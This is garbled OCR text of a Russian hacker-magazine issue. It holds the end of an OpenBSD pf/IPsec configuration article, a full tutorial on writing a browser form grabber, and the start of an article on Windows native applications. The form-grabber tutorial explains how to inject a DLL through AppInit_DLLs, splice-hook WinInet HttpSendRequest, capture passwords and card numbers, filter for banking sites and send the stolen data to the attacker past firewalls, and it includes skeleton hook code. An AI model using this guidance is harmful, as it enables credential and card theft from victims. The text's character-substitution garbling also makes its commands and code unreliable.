Іаддеб 192.168.2.2 

И по аналогии для таблицы ЫАТ и правил пере- 
направления: 

# рісіі -а "аиІІірІ/5Ііоскег(3884)" -з паі 

паі оп Тхрі іпеТ Ігот 192.168.2.2 Іо апу Іад 

192.168.2.2 -> (Тхрі ) гоипсІ-гоЬіп 

гсіг разз оп Тхрі іпеі ргоіо Іср Ігот апу Іо апу 

рогі = 4661 -> 192.168.2.2 

гсіг разз оп Іхрі іпеі ргоіо Іср Ігот апу Іо апу 

рогі = 4662 -> 192.168.2.2 

гсіг разз оп Іхрі іпеі ргоіо исір Ігот апу Іо апу 

рогі = 4665 -> 192.168.2.2 

гсіг разз оп Іхрі іпеі ргоіо исір Ігот апу Іо апу 

рогі = 4672 -> 192.168.2.2 

гсіг оп гаІО іпеі ргоіо Іср Ігот 192.168.2.2 Іо 

апу рогі = ІІр -> 127.0.0.1 рогі 8021 

[ірзесасіт: направь криптопотоки 
в нужное русло] Как вариант, можно отка- 
заться от использования ізактрб и посмотреть 
в сторону ірзесасІт(8) — программы управле- 
ния защищенными соединениями. Чтобы про- 
верить ее работу в действии, рассмотрим сце- 
нарий, когда и на сервере (ТЕСНІ_АВ), и на клиен- 
те (НОМЕ) установлена ОрепВЗО. 

[ НОМЕ ]-(1хр1) [ ІЗР] (ІхрО)- 

[ ТЕСШАВ ] 

Последовательно создаем два ключа — один 
для шифрования трафика (ЗОЕЗ, 192 Ьіі), дру- 
гой для аутентификации (ЗНА1, 160 Ьіі): 

# тксііг -т 700 /еіс/ірзес 



# орепззі гапсі 24 I Иехсіитр -е '24/1 "%02х"' > 
/еіс/ірзес/езр-епс-кеу 

# орепззі гапсі 20 I Ііехсіитр -е '20/1 "%02х"' > 
/еіс/ірзес/езр-аиііі-кеу 

# сМтос! 600 /еІс/ірзес/езр-*-кеу 

Далее, чтобы не изобретать себе лишние слож- 
ности, можно воспользоваться шаблоном из 
каталога /изг/зЬаге/ірзес: 

# ср /изг/зііаге/ірзес/гс.ѵрп /еіс/ірзес/гс.ѵрп 

# ѵі /еіс/ірзес/гс.ѵрп 

/* В отладочном режиме команды выводятся 
на экран без исполнения, комментируем 7 
#ОЕВІІ6=есІіо 

/* ІР-адреса локального и удаленного компь- 
ютеров 7 

6ѴѴ_І_0САІ_=81. 21 1.1.1 
6ѴѴ_ВЕМ0ТЕ=85.1 40.2.2 

/* Не указываем СЮВ-нотации внутренних 

подсетей 7 

ШСАи^ЕТМЖЗ^" 

ВЕМ0ТЕ_1\1Е"ПЛ/0ВКЗ= ММ 

/* Выбранные методы шифрования и аутен- 
тификации 7 
ЕІ\ІС=ЗсІе5 
АІІТН=5Ііа1 

/* Специальные индексы для создания тунне- 
ля 7 

ЗР1_01Л=1000 

ЗРІ_ІІ\І=1001 

/* Указываем абсолютные пути к файлам с 
ключами 7 

КЕУРИЕ=/еІс/ірзес/езр-епс-кеу 

АІЛНКЕУРИЕ=/еІс/ірзес/езр-аиІІп-кеу 

На стороне клиента скрипт будет выглядеть с 
минимальными правками: 

# ѵі /еіс/ірзес/гс.ѵрп 
[зпір] 

6ѴѴ_І_0САІ_=85.1 40.2.2 
0ѴѴ_ВЕМ0ТЕ=81. 21 1.1.1 
[зпір] 

ЗР1_01Л=1001 

ЗРІ_ІІ\І=1000 

[зпір] 

После того, как с помощью программы безопас- 
ного копирования зср(8) ключи (/ еіс/ірзес/езр - 
{аиііі ,епс}-кеу) будут переданы клиенту, останет- 
ся только запустить гс.ѵрп на каждом из хостов: 



зегѵег# зіі /еіс/ірзес/гс.ѵрп 
сііепі# зіі /еіс/ірзес/гс.ѵрп 

И при необходимости добавить его запуск 
в один из стартовых файлов. Например, так: 

# ѵі /еіс/гс.іосаі 

[ -I /еіс/ірзес/гс.ѵрп ] && зіі /еіс/ірзес/гс.ѵрп 

[полезные мелочи] Чтобы запросить у ядра 
ОС перечень действующих ІРЗес-туннелей и 
активных записей в базе ЗАОВ, можно вос- 
пользоваться штатной утилитой ірзессІІ(8): 

# ірзессІІ -5 аІІ 
РШѴѴЗ: 

ІІоѵѵ езр іп Ігот 192.168.2.2 Іо 192.168.2.1 
реег 192.168.2.2 

ІІоѵѵ езр оиі Ігот 192.168.2.1 Іо 192.168.2.2 
реег 192.168.2.2 
ЗАйВ: 

езр Ігот 192.168.2.1 Іо 192.168.2.2 зрі 

0x44338263 Збез-сЬс бтас-зЫ 
езр Ігот 192.168.2.2 Іо 192.168.2.1 зрі 

0хе6917ее7 ЗсІез-сЬс Итас-зИаІ 

Получить таблицу маршрутизации для инкапсули- 
рованных соединений можно с помощью пе№1(1): 

% пеізіаі -пг -I епсар 
Воиііпд ІаЫез 

Епсар: 

Зоигсе Рогі йезііпаііоп Рогі Ргоіо 
ЗА(АсІсІге55/РгоІо/Туре/ОігесІіоп) 

192.168.2.2/32 0 192.168.2.1/32 

0 0 1 92.1 68.2. 2/50/изе/іп 
192.168.2.1/32 0 192.168.2.2/32 

0 0 1 92.1 68.2. 2/50/гециіге/оиІ 

Для удаления всех ІРЗес-потоков: 

# ірзесасіт ІІизІі 

Псевдоустройство епс(4) представляет собой 
специальный интерфейс обратной петли, позво- 
ляющий производить фильтрацию ІРЗес-трафи- 
ка и просматривать прохождение входящих/исхо- 
дящих пакетов (относится только к транспортно- 
му режиму) перед тем, как они попадут во власть 
ЕЗР- и АН-протоколов. Конечно же, для выполне- 
ния этой операции необходимо обладать права- 
ми суперпользователя (несоответствие контроль- 
ных сумм не должно тебя здесь смущать, мы же 
ведем прослушивание на псевдоинтерфейсе): 

# Ісрбитр -п -е -III -ѵѵ -і епсО рогі 445 
Ісрбитр: ѴѴАВІМІІМСі: епсО: по ІРѵ4 асісігезз 
аззідпесі 

Ісрбитр: Іізіепіпд оп епсО, Ііпк-Іуре ЕМС 
Аид 13 18:55:31.373180 (аиІІіепІіс,сопІібеп- 
ІіаІ): ЗРІ 0х0Ы80абс1: 192.168.2.2.1066 > 
192.168.2.1.445: Р 

1804009685:1804009748(63) аск 2812031580 
ѵѵіп 17520 (йР) (II1 128, іб 33135, Іеп 103) 

Аид 13 18:55:31.373589 (аиІІіепІіс,сопІібеп- 
ІіаІ): ЗРІ 0хсб270528: 192.168.2.1.445 > 
192.168.2.2.1066: . 1:1425(1424) аск 63 ѵѵіп 
17088 (III 64, іб 46806, Іеп 1464, Ьаб скзит 
14! біііегз Ьу 3902) 

Приведенная схема работы в сочетании с кор- о 

ректно настроенным сІГюр-сервером и полуп- ^ 

розрачным мостом, выполняющим фильтра- о 

цию на основе МАС-адреса клиента (см. о. 

статью «Файрвол-невидимка»), сослужит тебе ^ 

хорошую службу. Удачи © 



аюхіічп 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІМХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




Обмен данными между браузером и веб-сервером происходит по протоко- 
лу НИР. НТТР запрос в общем виде состоит из метода запроса, его заго- 
ловков и тела запроса. Например, простейший запрос на получение стра- 
нички может выглядеть так: 






ѲЕТ/іпсІех.Мт НТТР/1.1 
Нозі: ѵѵш/.піііда.пеі 
Соппесііоп: сіозе 
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Грабим формы! 

ЧТО ТАКОЕ ФОРМГРАББЕР? ЭТО ПРОГРАММА, 
КОТОРАЯ ПЕРЕХВАТЫВАЕТ И СОХРАНЯЕТ ДАН- 
НЫЕ, ВВОДИМЫЕ В ФОРМАХ В БРАУЗЕРЕ. ИС- 
ПОЛЬЗУЮТСЯ ТАКИЕ ПРОГРАММЫ В ОСНОВ- 
НОМ ДЛЯ ПЕРЕХВАТА ПАРОЛЕЙ/НОМЕРОВ КРЕ- 
ДИТНЫХ КАРТ (ИЛИ ЛЮБЫХ ДРУГИХ ДАННЫХ^ 
ВВОДИМЫХ НА САЙТАХ. КОНЕЧНО, ДЛЯ ЭТОЙ 
ЦЕЛИ МОЖНО ИСПОЛЬЗОВАТЬ КЕЙЛОГЕР, 
НО РАЗБИРАТЬ ЕГО КИЛОМЕТРОВЫЕ ЛОГИ НЕ- 
УДОБНО, ПОЭТОМУ НУЖНА УЗКОСПЕЦИАЛИ- 
ЗИРОВАННАЯ СИСТЕМА ДЛЯ ПЕРЕХВАТА ИСК- 
ЛЮЧИТЕЛЬНО ФОРМ. КАК ТАКУЮ ШТУКУ НА- 
ПИСАТЬ ТЫ МОЖЕШЬ УЗНАТЬ 
В ЭТОЙ СТАТЬЕ I Мз-Вет (Мз-Вет@уапсІех.ги) 

Пишем простой 
формграббер 



Что такое вводимая в браузере форма? 
В каком виде она отправляется по сети? Какие 
функции при этом вызываются? Прежде чем 
писать формграббер, мы должны ответить на 
все эти вопросы. 



В данном случае методом запроса является (ЗЕТ, после которого идет крат- 
кий ІІВІ_ запроса и протокол (НТТР 1.1). ІІВІ_ может быть представлен как 
в кратком (/іпсІех.Ыт), так и в полном (ѵѵѵѵѵѵ.пШда.пеі/іпсіех.Мпп) виде. Все, 
что ниже, является заголовками запроса. Например, заголовок Нозі содер- 
жит адрес сервера, к которому будет направлен запрос. Имя и параметры 
заголовка запроса всегда разделены двоеточием. Заголовок запроса отде- 
лен от тела запроса двумя переводами строки (СЮОА). 

Рассмотрим теперь передачу по сети данных, введенных в форму. В этом 
случае запрос будет подобен этому: 

Р03Т Иир://192.168.0.58/сІгадоп/?.доосІ5.5аѵе_доосІ5 НТТР/1.1 
ВеТегег: Шр://1 92.1 68.0.58/сІгадоп/?.доосІ5.Іогт_есШ_доосі5&саІедо- 
гу_ісІ=1 21 

СопІепІ-Туре: тиШрагІЛогт-сІаІа; ЬоипсІагу= 

7с1534Ьае9с16 
Соппесііоп: Сіозе 
НозТ 192.168.0.58 
СопІепМепдІІі: 1024 

Соокіе: сі гад о п_со о кі е_і п сі ех=у ез ; сІгадоп_соокіе_доосІз=уез 
АіЛІіоітаІіоп: Вазіс 229з20р4УХ2ИВк0г 

7сі534Ьае09сі6 

СопІепШзрозШоп: Іогт-сіаіа; пате="доосі$[доосі$Iс]]" , 
йаіа 

7сІ534Ьае09сІ6 

СопІепШзрозШоп: Іогт-сіаіа; пате^доо^доойзНате]"' 

ІМате 

СопІепШзрозШоп: Іогт-сіаіа; пате="доосіз[доосіз^езс^ір^іоп]" , 
Оезсгірііоп 

Этот запрос достаточно сложен, хотя из него выброшены все необязатель- 
ные для понимания принципа работы заголовки, попробуем разобраться в 
назначении каждой его части. От предыдущего запроса он отличается, в пер- 
вую очередь, методом: РОЗТ вместо (ЗЕТ. Это означает, что идет запрос не 
на получение, а на отправку данных. В заголовке запроса присутствует поле 
Веіегег, оно определяет страницу, с которой был отправлен запрос. Это 
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очень важная информация, и в формграббере ее нужно обязательно сохра- 
нять. Присутствует также поле СопІепМуре, которое определяет тип содер- 
жимого запроса. Тип Іогт-сіаіа означает, что передаются данные формы, а 
Ьоипсіагу — строка разделитель полей формы. Поле Соокіе содержит посы- 
лаемые браузером куки. В них могут храниться авторизационные данные, 
поэтому содержимое этого поля нас может интересовать. Поле АиІНогігаІіоп 
содержит строку Нйр-авторизации, эти данные также могут представлять для 
нас интерес. На этом заголовок запроса заканчивается, идет два перевода 
строки, и начинается тело запроса. Элементы тела запроса разделены меж- 
ду собой строкой, которая передавалась в Ьоипсіагу заголовка запроса. 
Каждый элемент имеет строку, идентифицирующую его назначение 
(СопІепІ-ОізрозШоп) и одну или несколько строк с данными. Так выглядит 
запрос, отправленный методом РОЗТ. Но содержимое форм может еще 
передаваться методом (ЗЕТ, при этом параметры передаются прямо в ІІВІ_ 
запроса. Подобный II ВІ_ может выглядеть так: Мір://ѵѵѵѵѵѵ.уапсіех.ги/уапсІ- 
зеагсЬ? грі=гасі&іехі=ГогтОаіа. Я думаю, ты и сам сможешь понять, что 
этот запрос значит. 

Рассмотрим теперь, что происходит при посылке запроса весьма популяр- 
ным браузером Іпіегпеі Ехріогег. Сначала данные вводятся в поля ввода бра- 
узера, при нажатии кнопки ЗиЬтіІ происходит отправка этих данных в СОМ- 
объект Іпіегпеі Ехріогег’а, который является движком браузера. Дальше в 
СОМ-объекте происходит формирование запроса и передача его в функци- 
ям НДрОрепРециезІ и ННрЗепсІВедиезІ (ѴѴіпІпеі АРІ). Эти функции собирают 
запрос окончательно и отправляют его через сокеты (зепсі и гесѵ в 
ѵѵз2_32.сІІІ). Далее данные, направленные на сокеты, отправляются в ядро 
системы, где после обработки в стеке протоколов ТСР/ІР они отсылаются че- 
рез сеть. С другими браузерами дело может обстоять несколько иначе, нап- 
ример, они могут не пользоваться функциями ѴѴіпІпеІ АРІ, а формировать 
запрос вручную. В любом случае, они отправляют данные через сокеты. 
Вернемся теперь к нашим баранам (точнее, к формграбберам). Для перех- 
вата данных формы нам нужно вклиниться в описанный выше процесс на 
любой его стадии. Например, можно получить хэндл окна Іпіегпеі Ехріогег, 
перечислить все дочерние окна, отобрать среди них те, которые нам нуж- 
ны, и с помощью ѲеІѴѴіпсІоѵѵТехІ снять с каждого из них введенный текст. 
Этот метод применяется в некоторых троянах. 

Можно вклиниться и на уровне СОМ-объекта, через его интерфейсы мож- 
но не только снифать посылаемые данные, но даже посылать свои. Этот 
метод используется в трояне Ріпсіі для обхода файрволов. Недостаток тут 
только в громоздкости и неудобстве программирования СОМ-объектов. 
Более перспективным мне кажется метод перехвата функций 
НДрОрепВециезі и НирЗепсИЗециез!, так как он позволяет легко получать 
данные форф. Причем не просто получать, но и сразу же отправлять их, 
куда надо в обход файрволов. Функция НДрОрепПециезІ осуществляет 
открытие соединения, а НирЗепбРециез^ — отсылку самого запроса. Рас- 
смотрим их прототипы: 

НІІМТЕРМЕТ НПрОрепВедиезЦ 
НІІМТЕВЫЕТ ПСоппесІ, 

І.РСТЗТВ ІрзгѴегЬ, 

І.РСТЗТВ ІрзіОЬіесШате, 

І.РСТЗТВ ІрзіѴегзіоп, 

І.РСТЗТВ ІрзгВеТегег, 

І.РСТЗТВ* ІрзіАссерПурез, 

ОѴѴОВй сіѵѵРІадз, 

0ѴѴ0В0_РТВ сІѵѵСопІехІ 

); 

ІіСоппесІ — хэндл открытого соединения. 

ІрзгѴегЬ — строка метода запроса (ОЕТ, РОЗТ, НЕАЭ еіс). 

ІрзгОЬіесІІЧате — ІІРІ_, к которому направляется запрос. В нем могут пе- 
редаваться данные формы. Я думаю, ты уже разобрался с форматом этих 
данных из предыдущего описания. 

ІрзгѴегзіоп — версия используемого протокола (НТТР/1.0 или НТТР/1.1). 
ІрзгВеІегег — содержимое заголовка Веіегег (адрес страницы с которой 
был послан запрос). 

ІрзгАссерПурез — типы принимаемых браузером данных. 

бѵѵРІадз — комбинация управляющих флагов. Подробнее о них ты можешь 

почитать в МЗОЫ. 

бѵѵСопіехІ — дополнительные данные, которые приложение может пере- 
дать с запросом. 

В001_ НПрЗепсІВедиезЦ 
НІІМТЕВЫЕТ ііВедиезІ, 

І.РСТЗТВ ІрзгНеасІегз, 

ОѴѴОВй йѵѵНеайег5І_епдШ, 

І.РѴ0Ю ІрОрІіопаІ, 

ОѴѴОВй сІѵѵОрІіопаНепдіІі 

); 
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ИПецііезІ — хэндл запроса, полученный функцией НКрОрепПецііезІ. 
ІрзгНеасІегз — указатель на заголовки запроса. Формат заголовков НИР- 
протокола мы рассмотрели выше. 
сІѵѵНеасІег5І_епдІІі — размер заголовков. 

ІрОрІіопаІ — указатель на тело запроса. В нашем случае он будет содер- 
жать данные формы. С форматом этих данных мы уже тоже разобрались. 
сІѵѵОрІіопаІІ_епдіІі — размер данных тела запроса. 

[перехватываем ѴѴіпІпеІ АРІ] Теперь нам нужно научиться перехваты- 
вать функции ННрОрепПециезІ и НИрВепсІВецііезІ и сохранять в лог прохо- 
дящие через них данные. 

Для этого нам нужно сначала загрузить свою ОІ_І_ во все процессы системы. 
Это можно сделать, например, прописав ЭИ в разделе реестра 
НКЕУ_ЕОСАІ_МАСНІМЕ\ЗОРТѴѴАВЕ\МісгозотѴѴіпсІоѵѵз МТ\СиггепіѴегзіоп\ 
ѴѴіпбоѵѵз в ключ АррІпіЦЭІ_І_з (или с помощью хуков или создания удаленных 
потоков - прим. ред). Такая библиотека будет подгружена во все процессы, 
имеющие в своем адресном пространстве изег32.сІІІ (а это все ОШ приложе- 
ния). Для перехвата будем использовать метод сплайсинга. Заключается он в 
перезаписи начала кода перехватываемой функции 5 байтным ітр на свою 
функцию с предварительным копированием затертых байт в выделенный бу- 
фер и установкой после них ітр на продолжение функции. Главная проблема 
тут состоит в том, что нам нужно скопировать целое количество инструкций, 
а они могут иметь разный размер, следовательно, нам понадобится дизассе- 
мблер длин. Все вышеописанное уже реализовано в моей библиотеке 
асІѵАріНоок, поэтому можно просто подключить ее и не париться. 

Сам же код ОН будет выглядеть приблизительно так: 

ІіЬгагу РогтбгаЬ; 
изез 



по прошествии определенного времени результат работы 
формграббера должен высылаться на мыло, закачиваться на РТР 
или любым другим способом передаваться хакеру. При этом бу- 
дет очень кстати сжать и зашифровать передаваемые данные. 

[фильтрация полученных данных] При большом коли- 
честве машин, на которых установлен формграббер возника- 
ют сложности в отсеивании необходимых нам данных. Обыч- 
но хакера ведь интересуют данные, введенные только в опре- 
деленных формах и на конкретных сайтах, поэтому требуется 
сохранять не все полученные данные, а только те, которые ре- 
ально пригодятся. Для этого можно проанализировать ІІВІ_ и 
Веіегег запроса и отсеять только нужные формы. Неплохо бу- 
дет анализировать не только запрос, но и ответ сервера. Нап- 
ример, при вводе какого-либо пароля нам нужно получить 
только правильные пароли, а случайные ошибки ввода следу- 
ет фильтровать. Для этого можно анализировать код ответа 
сервера, либо содержимое возвращаемой НТМЬстраницы по определен- 
ным ключевым словам. Таким образом работает большинство формграб- 
беров. 

Недостаток вышеприведенного способа один — он работает только с 
Іпіегпеі ЕхрІогеГом и другими браузерами, построенными на его движке 
(например, Аѵапі Вгоѵѵзег). Для преодоления этого недостатка можно пе- 
рехватывать не ѴѴіпІпеІ АРІ, а зепсі из ѵѵз2_32.сІІІ, после чего нам нужно бу- 
дет собирать посылаемый запрос в буфере и сохранять его в момент 
окончания отправки данных. Этот момент можно определить по вызову 
сіозезоскеі для интересующего нас сокета, либо можно извлечь 
Соп1еп1І_епдФ из передаваемых заголовков и определить по нему момент 
окончания передачи тела запроса. Естественно, первый метод значитель- 
но проще в реализации, да и особых недостатков у него не имеется. Нам 
просто нужно вести список сокетов, и для каждого сокета строить список 
принятых пакетов. При закрытии сокета собранные данные обрабатыва- 
ются. Для всего этого нам нужно перехватывать всего три АРІ-функции: 
соппесі, зепсі и созезоскеі. Этот метод будет работать со всеми браузера- 
ми без исключения, но он сложен в реализации и имеет один неприятный 
недостаток — невозможность перехвата шифрованных форм. Большин- 
ство банковских служб, интернет-магазинов и других требующих безо- 
пасности ресурсов работают не по открытому НТТР-протоколу, а через 
ЗЗІ_/Т8І_-соединение, и все данные передаются по сети в шифрованном 
виде. Естественно, в таком же виде они и посылаются на сокеты. Поэто- 
му нам нужно сохранять только данные, отправляемые по нешифрова- 
нному НТТР-протоколу. Отличить простой НТТР от ЗЗІ_ легко: первый 
имеет стандартный порт сервера 80, а второй — 443. Конечно, эти серви- 
сы могут быть и на нестандартных портах, но это случается весьма ред- 
ко, поэтому нам нужно перехватывать трафик, идущий только на 80 порт, 
это легко определить по параметрам вызова соппесі. 



ѴѴІПСІ0ѴѴ5, 

асІѵАріНоок; 

ѵаг 

ТгиеННрЗепсШедиезІ: Іипсііоп (ЬВедиезІ: сіѵѵогсі; 
ІрзіНеасіегз: РСИаг; 

ЬѵѵНеас1ег5І_епдІЬ: сіѵѵогсі; ІрОрІіопаІ: роіпіег; 
ЬѵѵОрЬопаНепдІЬ: сіѵѵогсі): Ьооіеап; зісісаіі; 



Іипсііоп МеѵѵНПрЗепсШедиез^ЬВедиезІ: сіѵѵогсі; ІрзгНеасІегз: РСЬаг; 
ЬѵѵНеас1ег5І_епдІЬ: сіѵѵогсі; ІрОрІіопаІ: роіпіег; 
ЬѵѵОрІіопаІІ_епдІЬ: сіѵѵогсі): Ьооіеап; зісісаіі; 

Ьедіп 

МеззадеВохА(0, ІрзіНеасІегз, ІрОрІіопаІ, 0); 

ВезиІІ := ТгиеНПрЗепсШедиез^ЬКедиезІ, ІрзіНеасІегз, 
сІѵѵНеасІег5І_епдІЬ, ІрОрІіопаІ, ЬѵѵОрЬопаІІ_епд{Ь); 
епсі; 



[законность] Ты, наверно, не раз задумывался о том, что будет в случае 
поимки автора формграббера. Будет ли это дело квалифицировано по 
статье 273 УК РФ «Создание и распостранение вредоносных программ для 
ЭВМ» зависит от того, какова функциональность твоего формграббера, 
и оттого, нанес ли он кому-нибудь реальный ущерб. Простой формграббер, 
сохраняющий на диск все отправляемые через браузер данные, под кате- 
горию вредоносных программ вряд ли попадает, так как подобные вещи ис- 
пользуют даже в сетях крупных организаций для наблюдения над своими 
сотрудниками. А вот формграббер, определяющий банковские системы и 
отправляющий данные на мыло в обход файрволов, под категорию вредо- 
носных программ, несомненно, попадает. Конечно, если никто от хакерско- 
го творения не пострадал, то никто никого искать не будет, а формграббер 
просто добавят в базы антивирусов, но если денег лишился влиятельный 
человек или солидная организация, то могут развернуться весьма масш- 
табные поиски. В таком случае, если автора поймают, то, скорее всего, да- 
дут не 273, а 159 статью (мошенничество), и наказание за это будет более 
строгим, чем за написание вредоносных программ. В общем, не рекомен- 
дую тебе заниматься чем-либо, что может как-то плохо отразиться на тво- 
ей будущей светлой жизни © 



Ьедіп 

НоокРгос('ѵѵіпіпеІсІІГ, ШрЗепЬВедиезІА', 

ШеѵѵНПрЗепсШедиезІ, ©ТгиеНПрЗепсІРедиезі); 
епсі. 

Эта библиотека, будучи прописанной в реестре, будет выводить 
сообщение с содержимым посылаемого запроса. Реальный же 
формграббер должен, конечно, не выводить, а сохранять запрос. 
Причем целесообразнее будет не просто сохранять запрос в не- 
изменном виде, а разбирать его структуру и вытаскивать из нее 
нужные данные. При достижении какого-либо размера лога, или 
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Родные 
приложения 

НАВЕРНОЕ, НЕ РАЗ ТЕБЕ ПРИХОДИЛОСЬ АВА- 
РИЙНО ЗАВЕРШАТЬ РАБОТУ ТВОЕЙ ВИНДЫ. 
ПРИ СЛЕДУЮЩЕМ ЗАПУСКЕ ЕЩЕ ДО СТАРТА 
ОБОЛОЧКИ ТЕБЕ ПРЕДЛАГАЛОСЬ ПРОВЕРИТЬ 
ТВОЙ ВИДАВШИЙ ВИДЫ ЖЕСТКИЙ ДИСК НА 
ПРЕДМЕТ ЦАРАПИН, ВАЭ-СЕКТОРОВ, ПОТЕ- 
РЯННЫХ КЛАСТЕРОВ И ПРОЧИХ ПОВРЕЖДЕ- 
НИЙ С ПОМОЩЬЮ СКАНДИСКА. БЕЛЫМ 
ШРИФТОМ НА СВЕТЛО-ГОЛУБОМ ФОНЕ ОН 
ПЕРЕЧИСЛЯЛ ВСЕ ВОЗМОЖНЫЕ НЕПОЛАДКИ, 
ПОСЛЕ ЧЕГО ВЫПЛЕВЫВАЛ: «ГУЛЯЙ, МОЛО- 
ДОЙ, ЖИТЬ БУДЕШЬ», И ПРОДОЛЖАЛ НОР- 
МАЛЬНУЮ ЗАГРУЗКУ ѴѴІШОѴѴЗ. БЫЛО ВЕДЬ 
ТАКОЕ? А НЕ ЗАДАВАЛСЯ ЛИ ТЫ ВОПРОСОМ, 
КАК РАБОТАЕТ ЭТОТ САМЫЙ СКАНДИСК? ЧТО 
ЭТО ЗА ПРОГРАММА ТАКАЯ, КОТОРАЯ МОЖЕТ 
СУЩЕСТВОВАТЬ ЕЩЕ ДО СТАРТА ВИНДЫ С ЕЕ 
ЗАМЕЧАТЕЛЬНЫМ ОІІІ-ВЫМ ИНТЕРФЕЙСОМ, 

А? ПОВЕРЬ МНЕ, ЭТА ТЕМА СТОИТ ТОГО, ЧТО- 
БЫ С НЕЙ КАК СЛЕДУЕТ РАЗОБРАТЬСЯ I Николай 

«догі» Андреев (догІит@геаІ.хакер.ш) 

Вникаем 
в Дзен виндовых 
Ыаііѵе-приложений 

Нет, ты только не подумай, что мы сейчас бу- 
дем копаться с тем, как скан диск находит. Это 
нам сегодня абсолютно не в кассу. Мы будем 



изучать особый тип приложений, 
вызываемых еще до старта ѴѴіп32- 
подсистемы, так называемых 
Ыаііѵе-приложений. 

Как ты, наверное, знаешь, отли- 
чительная особенность ѴѴіпбоѵѵз 
2000 и более старших ее версий в 
том, что в ней реализовано нес- 
колько подсистем, обеспечиваю- 
щих работу приложений ѴѴіп32 (то 
есть обычных виндовых, исполь- 
зующих так всеми любимые кег- 
пеІ32.сНІ, изег32.сІІІ и еще сотню 
другую динамически зависающих 
библиотек), РОЗІХ и 03/2. А отли- 
чительная особенность Ыаііѵе-при- 
ложений, о которых, собственно, и 
идет сегодня речь, в том, что они 
не относятся ни к одной из выше- 
перечисленных подсистем. Они 
сами по себе. Ключ к пониманию 
этого факта в самом названии. 
Что может напоминать слово 



т 




Чтобы реализовать ввод 
данных с клавиатуры, в 
нашем приложении при- 
дется уже поизвращаться: 
открыть ШСгеаіеЕіІе’ом 
драйвер клавиатуры 
(\\0е ѵісе\\КеуЬоагбСІазз ) , 
привязать к нему 
І\ИСгеаіеЕѵепі’ом событие 
и т.д. и т.п. — механизм 
всего этого дела тебе 
придется изучать самому, 
уродуя дизассемблер 
аиіосйк.ехе. 

На английском языке о 
разработке паііѵе-прило- 
жений ты можешь про- 
честь на 

шшш.зузіпіегпаіз.сот 
в статье Іпзібе Ыаііѵе 
Арріісаііопз, датированной 
аж 98ым годом. 



Ыаііѵе? Конечно же, АРІ: где 

Ыаііѵе, там и АРІ. Родной системный интерфейс винды, на котором 
строятся все прочие интерфейсы для работы тех или иных приложе- 
ний. Так вот, не относящиеся к тем или иным, Ыаііѵе-приложения — 
это программы, использующие исключительно Ыаііѵе АРІ, то есть пол- 
ностью абстрагирующиеся от неприятных наворотов небольшой кучки 
виндовых подсистем, обеспечивающих почти никому ненужную сов- 



местимость. Причем 
только ІМаііѵе АРІ оз- 
начает, что в таблице 
импорта экзешника 
уже привычного нам 
РЕ-формата мы не 
сможем встретить ни- 
чего, кроме пісііі.сііі, 
библиотеки, экспор- 
тирующей для поль- 
зовательских прило- 
жений родной для 
пі'евых форточек на- 
бор функций. Запус- 
каются такие программы исключительно системой, менеджером 
сессий зтзз.ехе, у пользователя выполнить их не получится. 

«Круто, — скажешь ты, — но зачем мне вся эта родная майкрософ- 
товская ересь?» О, вот здесь в моем рассказе и начнется самое ин- 
тересное. Характерной особенностью Ыаііѵе-приложений, как я уже 
замечал, является то, что они могут выполняться еще до запуска и 
инициализации ѴѴіп32-подсистемы. То есть до того, как в память бу- 
дут загружены ехріогег.ехе, ѵѵіпіодоп.ехе и еще чертов миллион биб- 
лиотек, ими используемых. Собственно, как раз за счет этого скан- 
диск и может беспрепятственно шарить по диску, править сектора и 
т.п. — ничего еще не загружено, ко всему есть доступ, можно даже 
диск форматировать! 

Так, допустим, форматирование нам сейчас и не нужно, но вот воз- 
можность модифицировать некоторые файлики может оказаться 
очень кстати. Взять, подправить чуток зіс.сІІІ, капельку ехріогег.ехе, 
совсем немного кегпеІ32.сІІІ, и живи себе — радуйся, с новыми 
экстравагантными способами обхода файрвола, невидимости и авто- 
запуска. Ой, опять я об «этом» заговорил. Успокою любителей мир- 
ного программирования: большинство задач, требующих прямого и 
беспрепятственного доступа к диску решаются именно с помощью 
разработки Ыаііѵе-приложений. Вот, незаменимый Рагііііоп Мадіс, 
например, когда ему требуется хардкорно перелопатить весь диск, 
после рестарта уползает как раз на приятный дозагрузочный светло- 
голубой фон, где и осуществляет свое не самое темное дело. 

В конце концов, ІМаііѵе-приложения нужны хотя бы для того, чтобы у прия- 
телей твоих челюсть отпала от вида НеІІо ѴѴогІсІ! еще до загрузки ѴѴіпбоѵѵз. 
Это ведь не какой-нибудь банальный МеззадеВох, это ргеіоаб-программа. 




[что нужно для...] Раз ты дочитал до этого места, вопрос «зачем?» у те- 
бя уже не стоит. Следующий вопрос, наверное, — «как?». Что ж, как обыч- 
но — очень просто. В старой доброй студии напишем проект, скомпилиру- 
ем, проапдейтим запись в реестре и все — геморроя не очень много. 
Первое с чем надо разобраться, так это с тем, как написать при относи- 
тельно обычных усло- 
виях приложение, ис- 
пользующее только 
ІМаііѵе АРІ. То есть, 
что для этого требует- 
ся. Оказывается, не 
очень много: 

- ѴізиаІ Зіисііо .І\ІЕТ, в 
которой компилиру- 
ются все представ- 
ленные мной ранее 
проекты на Си. Я не 





прописываем пути к ООК в настройках студии 



буду изменять своей привычке. 

- ѴѴіпбоѵѵз ЭЭК, набор для созда- 
ния драйверов. Он нам нужен не 
как среда для разработки, а как 
источник драгоценных определе- 
ний структур ядра и типов данных, 
активно используемых ІМаііѵе АРІ, 
уже не говоря о том, что библиоте- 
ку пісііі.ііЬ в других местах задол- 
баешься искать. 

- Заголовочный файл пі.Н, взятый 
мной откуда-то из Сети. Ранее он 
имел немного другое название, но 
я его подредактировал, подправил 
для использования в ІМаііѵе-прило- 
жениях и поэтому переименовал. 

В нем содержатся описания функ- 
ций, экспортируемых пісііі.сііі. Как 
это ни печально, в пісісік.іі описана 
лишь малая часть необходимых 
для работы паііѵе-функций, поэто- 
му приходится использовать от- 
нюдь не родные заголовки. 

Обладая всем необходимым мож- 
но самым непосредственным об- 
разом приступать к программиро- 
ванию здравствуймир’а. 

[структура приложения] Марк 
Руссинович ( ѵѵѵѵѵѵ.зузіпіегпаіз.сот ) 
советует писать нативные прог- 
раммы, пользуясь исключительно 
ОЭК. Для тех, кто всю жизнь раз- 
рабатывает драйвера, — это, ко- 
нечно, идеальный вариант, но мне, 
честно говоря, привычнее визуаль- 
ная студия (причем не самая но- 
вая). Я создал в ней самый обыч- 
ный ѴѴіп32-проект и просто чуть- 
чуть подкорректировал: убрал все, 
